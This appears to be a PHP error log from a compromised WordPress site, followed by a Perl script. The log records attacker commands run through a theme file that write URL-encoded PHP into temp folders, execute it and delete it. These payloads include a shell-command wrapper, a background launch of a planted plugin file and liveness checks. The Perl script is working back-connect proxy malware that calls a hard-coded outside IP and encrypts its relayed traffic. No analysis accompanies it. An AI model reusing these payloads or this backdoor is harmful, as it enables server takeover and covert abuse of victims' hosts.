[04-Aug-2025 08:15:25 UTC] PHP Parse error: syntax error, unexpected double-quote mark, expecting "]" in /tmp/.oauthexceptions on line 32 [05-Aug-2025 06:12:21 UTC] PHP Parse error: syntax error, unexpected double-quote mark, expecting "]" in /tmp/.content on line 31 [05-Aug-2025 10:35:25 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20%20%20run%28%22/home/muhalrqw/techknockwebsites.xyz/wp-content/plugins/royal-elementor-addons/modules/video-playlist/default_content%20%26%20%3E%20/dev/null%202%3E%261%22%29%3B%20function%20run%28%24in%29%20%7B%20%20%20%20%20%24out%20%3D%20%27%27%3B%20%20%20%20%20if%20%28function_exists%28%27exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%40exec%28%24in%2C%20%24out%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%40join%28%22%5Cn%22%2C%20%24out%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27passthru%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40passthru%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27system%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40system%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27shell_exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%40shell_exec%28%24in%29%3B%20%20%20%20%20%7D%20elseif%20%28is_resource%28%24f%20%3D%20%40popen%28%24in%2C%20%22r%22%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%22%22%3B%20%20%20%20%20%20%20%20%20while%20%28%21%40feof%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24out%20.%3D%20fread%28%24f%2C%201024%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20pclose%28%24f%29%3B%20%20%20%20%20%7D%20%20%20%20%20return%20%24out%3B%20%7D%20");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.accept";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:35:36 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20%20%20%24res%20%3D%20run%28%22pgrep%20default_content%22%29%3B%20if%20%28preg_match%28%27/%5Cd%2B/%27%2C%20%24res%29%29%20%7B%20%20%20%20%20die%28%27_success_%27%29%3B%20%7D%20else%20%7B%20%20%20%20%20die%28%27_failed_%27%29%3B%20%7D%20%20function%20run%28%24in%29%20%7B%20%20%20%20%20%24out%20%3D%20%27%27%3B%20%20%20%20%20if%20%28function_exists%28%27exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%40exec%28%24in%2C%20%24out%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%40join%28%22%5Cn%22%2C%20%24out%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27passthru%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40passthru%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27system%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40system%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27shell_exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20shell_exec%28%24in%29%3B%20%20%20%20%20%7D%20elseif%20%28is_resource%28%24f%20%3D%20%40popen%28%24in%2C%20%22r%22%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%22%22%3B%20%20%20%20%20%20%20%20%20while%20%28%21%40feof%28%24f%29%29%20%20%20%20%20%20%20%20%20%20%20%20%20%24out%20.%3D%20fread%28%24f%2C%201024%29%3B%20%20%20%20%20%20%20%20%20pclose%28%24f%29%3B%20%20%20%20%20%7D%20%20%20%20%20return%20%24out%3B%20%7D%20");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.config";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:46:39 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22NAWllzlpGfHMqFbX%22.%22fDgvYOIcyKKqoRgw%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.locked";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:50:41 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20%20%20%24res%20%3D%20run%28%22pgrep%20suggestcategory%22%29%3B%20if%20%28preg_match%28%27/%5Cd%2B/%27%2C%20%24res%29%29%20%7B%20%20%20%20%20die%28%27_success_%27%29%3B%20%7D%20else%20%7B%20%20%20%20%20die%28%27_failed_%27%29%3B%20%7D%20%20function%20run%28%24in%29%20%7B%20%20%20%20%20%24out%20%3D%20%27%27%3B%20%20%20%20%20if%20%28function_exists%28%27exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%40exec%28%24in%2C%20%24out%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%40join%28%22%5Cn%22%2C%20%24out%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27passthru%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40passthru%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27system%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40system%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27shell_exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20shell_exec%28%24in%29%3B%20%20%20%20%20%7D%20elseif%20%28is_resource%28%24f%20%3D%20%40popen%28%24in%2C%20%22r%22%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%22%22%3B%20%20%20%20%20%20%20%20%20while%20%28%21%40feof%28%24f%29%29%20%20%20%20%20%20%20%20%20%20%20%20%20%24out%20.%3D%20fread%28%24f%2C%201024%29%3B%20%20%20%20%20%20%20%20%20pclose%28%24f%29%3B%20%20%20%20%20%7D%20%20%20%20%20return%20%24out%3B%20%7D%20");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.created";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:51:52 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22rTlVcSzGImxVsvWeM%22.%22ztdYLVwCNrIqSKgr%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.requests";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:52:13 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22aSQatouxgePQtAeGM%22.%22nKVBoNbNduQ%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.content";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:52:19 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22CYCTmNjtkB%22.%22NyuGKzkARgqGvpFFt%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.rjust";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:52:25 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22hZpjliVYOOblgmDJlzSt%22.%22gstJihxiLYd%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.locked";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:52:42 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22pfVEXbeJhrjm%22.%22BoSOVUErNunmog%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.post";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 10:52:53 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22vGihbWaSncQd%22.%22PRuWmkbsoCuNvsbOueD%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.oauthexceptions";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 11:35:43 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22TWlWFyvRiINKhAz%22.%22KkAUGmHonxUVQloBa%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.post";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 11:35:44 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22MlzfkOtlypTNNj%22.%22ntCoGNoXSzMR%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.content";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 11:35:45 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22YRUtPIMeGhlSYLhtuXaN%22.%22sQVoYIAKTYnfn%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.parle_tokens";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 11:35:46 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22rjNtEpssWUaO%22.%22kYnbuHjuTHZqSn%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.classes";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 [05-Aug-2025 11:36:08 UTC] PHP Warning: system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode("%3C%3Fphp%20print%20%22eDEARsjopmxTS%22.%22WbDIcfJyyxogDwsQwoMW%22%3Bexit%3B");foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.dbx_convert";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");'] in /home/muhalrqw/techknockwebsites.xyz/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/search.trigger.php on line 23 #!/usr/bin/perl use strict; use warnings; use Socket; use Socket qw(IPPROTO_TCP TCP_NODELAY); use Fcntl; use Fcntl qw(:flock); use threads; use threads::shared; my $host = '45.146.130.23'; my $port = 443; my $xordata = "\x00" x 50; for (my $i = 0; $i < 50; $i++) { substr($xordata, $i, 1) = pack('C', rand(255)); } sub Rc4_crypt { my $passw = shift(@_); my $length = shift(@_); my $buff0 = shift(@_); my $start = shift(@_); my $sz = shift(@_); my $rc4 = "\x00" x 256; my $pockemon0 = 0; my $pockemon1 = 0; my $pockemon2 = 0; my $pockemon3 = 0; my $pockemon4 = 0; my $pockemon5 = 0; my $pockemon6 = 0; my $pockemon7 = 0; my $pockemon8 = 0; my $rcx = $sz; my $rsi = 0; my $rbx = 0; my $gs = 0; my $t = 0; for (my $i = 0; $i <= 255; $i++) { substr($rc4, $i, 1) = pack('C', $i); } do { substr($$buff0, $start + $rsi, 1) = pack('C', (unpack('C', substr($$buff0, $start + $rsi, 1)) ^ unpack('C', substr($$passw, $rbx, 1)))); $rsi++; $rbx++; $rcx--; if ($rbx == $length) { $rbx = 0; } } while($rcx > 0); while(1) { if ($gs == 0) { $pockemon2 = 0; $pockemon3 = $length; } if ($gs != 0) { $gs = 0; $pockemon2++; if (--$pockemon3 == 0) { next; } } $pockemon7 = unpack('C', substr($rc4, $pockemon0, 1)); $t = unpack('C', substr($$passw, $pockemon2, 1)); $pockemon1 += $t; $pockemon1 = $pockemon1 & 255; $pockemon1 += $pockemon7; $pockemon1 = $pockemon1 & 255; $pockemon6 = unpack('C', substr($rc4, $pockemon1, 1)); substr($rc4, $pockemon0, 1) = pack('C', $pockemon6); substr($rc4, $pockemon1, 1) = pack('C', $pockemon7); $pockemon0++; $pockemon0 = $pockemon0 & 255; if ($pockemon0 != 0) { $gs = 1; next; } $pockemon4 = $sz; $pockemon1 = 0; $pockemon0 = 0; $pockemon2 = 0; $pockemon3 = 0; while(1) { $pockemon2++; $pockemon2 = $pockemon2 & 255; $pockemon7 = unpack('C', substr($rc4, $pockemon2, 1)); $pockemon1 += $pockemon7; $pockemon1 = $pockemon1 & 255; $pockemon8 = unpack('C', substr($rc4, $pockemon1, 1)); substr($rc4, $pockemon2, 1) = pack('C', $pockemon8); substr($rc4, $pockemon1, 1) = pack('C', $pockemon7); $pockemon8 += $pockemon7; $pockemon8 = $pockemon8 & 255; $pockemon0 = unpack('C', substr($rc4, $pockemon8, 1)); $pockemon5 = unpack('C', substr($$buff0, $start + $pockemon3, 1)); $pockemon5 = $pockemon5 ^ $pockemon0; substr($$buff0, $start + $pockemon3, 1) = pack('C', $pockemon5); $pockemon3++; if (--$pockemon4 == 0) { last; } } last; } $rsi = 0; $rcx = $sz; $rbx = 0; do { substr($$buff0, $start + $rsi, 1) = pack('C', (unpack('C', substr($$buff0, $start + $rsi, 1)) ^ unpack('C', substr($$passw, $rbx, 1)))); $rsi++; $rbx++; $rcx--; if ($rbx == $length) { $rbx = 0; } } while($rcx > 0); } sub synsend { my $cSocket = shift(@_); my $buffer = shift(@_); my $flags = shift(@_); open(my $fh, "<", '/dev/null'); flock($fh, LOCK_EX); # =============================================== send($cSocket, $buffer, $flags); # =============================================== flock($fh, LOCK_UN); close($fh); } sub newConnection { my $num = shift(@_); my $socketarray = shift(@_); my $sSocket = shift(@_); my $cSocket = shift(@_); my $buff0 = shift(@_); threads->create( sub { my $responce = pack('C', $num)."\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00"; my $domain = ''; my $port = 0; my $_ret = 0; my $data = ''; my $buffer = ''; setsockopt($cSocket, IPPROTO_TCP, TCP_NODELAY, 1); fcntl($cSocket, F_SETFL, O_NONBLOCK); if (unpack('C', substr($buff0, 7, 1)) == 3) { $domain = substr($buff0, 9, unpack('C', substr($buff0, 8, 1))); $port = unpack('S', substr($buff0, 9 + unpack('C', substr($buff0, 8, 1)) + 1, 1).substr($buff0, 9 + unpack('C', substr($buff0, 8, 1)) + 0, 1)); } elsif (unpack('C', substr($buff0, 7, 1)) == 1) { $domain = sprintf("%d.%d.%d.%d", unpack('C', substr($buff0, 8 + 0, 1)), unpack('C', substr($buff0, 8 + 1, 1)), unpack('C', substr($buff0, 8 + 2, 1)), unpack('C', substr($buff0, 8 + 3, 1))); $port = unpack('S', substr($buff0, 12 + 1, 1).substr($buff0, 12 + 0, 1)); } else { goto close_; } eval { my $paddr = sockaddr_in($port, inet_aton($domain)); connect($cSocket, $paddr); vec(my $win = '', fileno($cSocket), 1) = 1; unless (select(undef, $win, undef, 10)) { goto close_; } fcntl($cSocket, F_SETFL, 0); substr($responce, 4, 1) = "\x00"; $_ret = 1; }; close_: Rc4_crypt(\$xordata, 50, \$responce, 0, 3); Rc4_crypt(\$xordata, 50, \$responce, 3, 10); synsend($sSocket, $responce, MSG_NOSIGNAL); Rc4_crypt(\$xordata, 50, \$responce, 0, 3); if ($_ret == 1) { while ($$socketarray[$num] == 1) { vec(my $rin = '', fileno($cSocket), 1) = 1; unless (select($rin, undef, undef, 1)) { next; } $data = ''; recv($cSocket, $data, 65530, 0); unless ($data) { last; } $buffer = pack('C', $num).pack('S', length($data)).$data; Rc4_crypt(\$xordata, 50, \$buffer, 0, 3); Rc4_crypt(\$xordata, 50, \$buffer, 3, length($data)); synsend($sSocket, $buffer, MSG_NOSIGNAL); } } $$socketarray[$num] = 0; close($cSocket); substr($responce, 1, 2) = "\x00\x00"; Rc4_crypt(\$xordata, 50, \$responce, 0, 3); synsend($sSocket, substr($responce, 0, 3), MSG_NOSIGNAL); threads->detach(); }); } sub bccnct { my $host = shift(@_); my $port = shift(@_); my $remaining = 0; my $remaining4 = 0; my @socketarr; my @socketarray :shared; my $buffer = "\x00" x 100; my $buffernull = "\x00" x 3; my $buffer0 = ''; my $isExit = 0; my $ecx = 0; my $eax = 0; my $data = ''; my $_ret = 0; my $ebx = 0; my $edx = 0; socket($socketarr[0], PF_INET, SOCK_STREAM, getprotobyname('tcp')); setsockopt($socketarr[0], IPPROTO_TCP, TCP_NODELAY, 1); my $paddr = sockaddr_in($$port, inet_aton($$host)); unless(connect($socketarr[0], $paddr)) { goto close0; } substr($buffer, 0, 50) = $xordata; substr($buffer, 50, 2) = "\xFF\xFF"; substr($buffer, 54, 11) = "Perl script"; Rc4_crypt(\$xordata, 50, \$buffer, 50, 50); send($socketarr[0], $buffer, MSG_NOSIGNAL); while(1) { if ($remaining4 != 4) { vec(my $rin = '', fileno($socketarr[0]), 1) = 1; my $ret = select($rin, undef, undef, 60); next if ($ret < 0); if ($ret == 0) { last if (substr($buffernull, 0, 3) ne "\x00\x00\x00"); last if ($remaining != 0); last if ($remaining4 != 0); Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3); synsend($socketarr[0], $buffernull, MSG_NOSIGNAL); next; } } if ($remaining != 0 || $remaining4 == 4) { if ($edx == 0) { if (substr($buffer0, 0, 1) eq "\xFF" && substr($buffer0, 1, 1) eq "\xFE") { $isExit = 1; last; } elsif ($ebx < 200 && $ebx > 0) { $socketarray[$ebx] = 0; } } else { $ecx = $edx; $ecx = $ecx - $remaining; $data = ''; recv($socketarr[0], $data, $ecx, 0); unless ($data) { last; } $remaining += length($data); $buffer0 .= $data; if ($edx == $remaining) { Rc4_crypt(\$xordata, 50, \$buffer0, 4, $remaining); if (unpack('C', substr($buffer0, 0, 1)) == 0) { socket($socketarr[$ebx], PF_INET, SOCK_STREAM, getprotobyname('tcp')); $socketarray[$ebx] = 1; newConnection($ebx, \@socketarray, $socketarr[0], $socketarr[$ebx], $buffer0); } else { send($socketarr[$ebx], substr($buffer0, 4, $remaining), MSG_NOSIGNAL); } $remaining = 0; } } $remaining4 = 0; } else { if ($remaining4 == 0) { $buffer0 = ''; } $eax = 4; $eax = $eax - $remaining4; $data = ''; recv($socketarr[0], $data, $eax, 0); unless ($data) { last; } $remaining4 += length($data); $buffer0 .= $data; $buffernull = "\x00" x 3; if ($remaining4 == 4) { Rc4_crypt(\$xordata, 50, \$buffer0, 0, 4); $ebx = unpack('C', substr($buffer0, 1, 1)); $edx = unpack('S', substr($buffer0, 2, 2)); $_ret = 1; } } } close0: close($socketarr[0]); for (my $i = 0; $i < 200; $i++) { $socketarray[$i] = 0; } sleep 10; if ($isExit == 1) { exit; } return $_ret; } bccnct(\$host, \$port);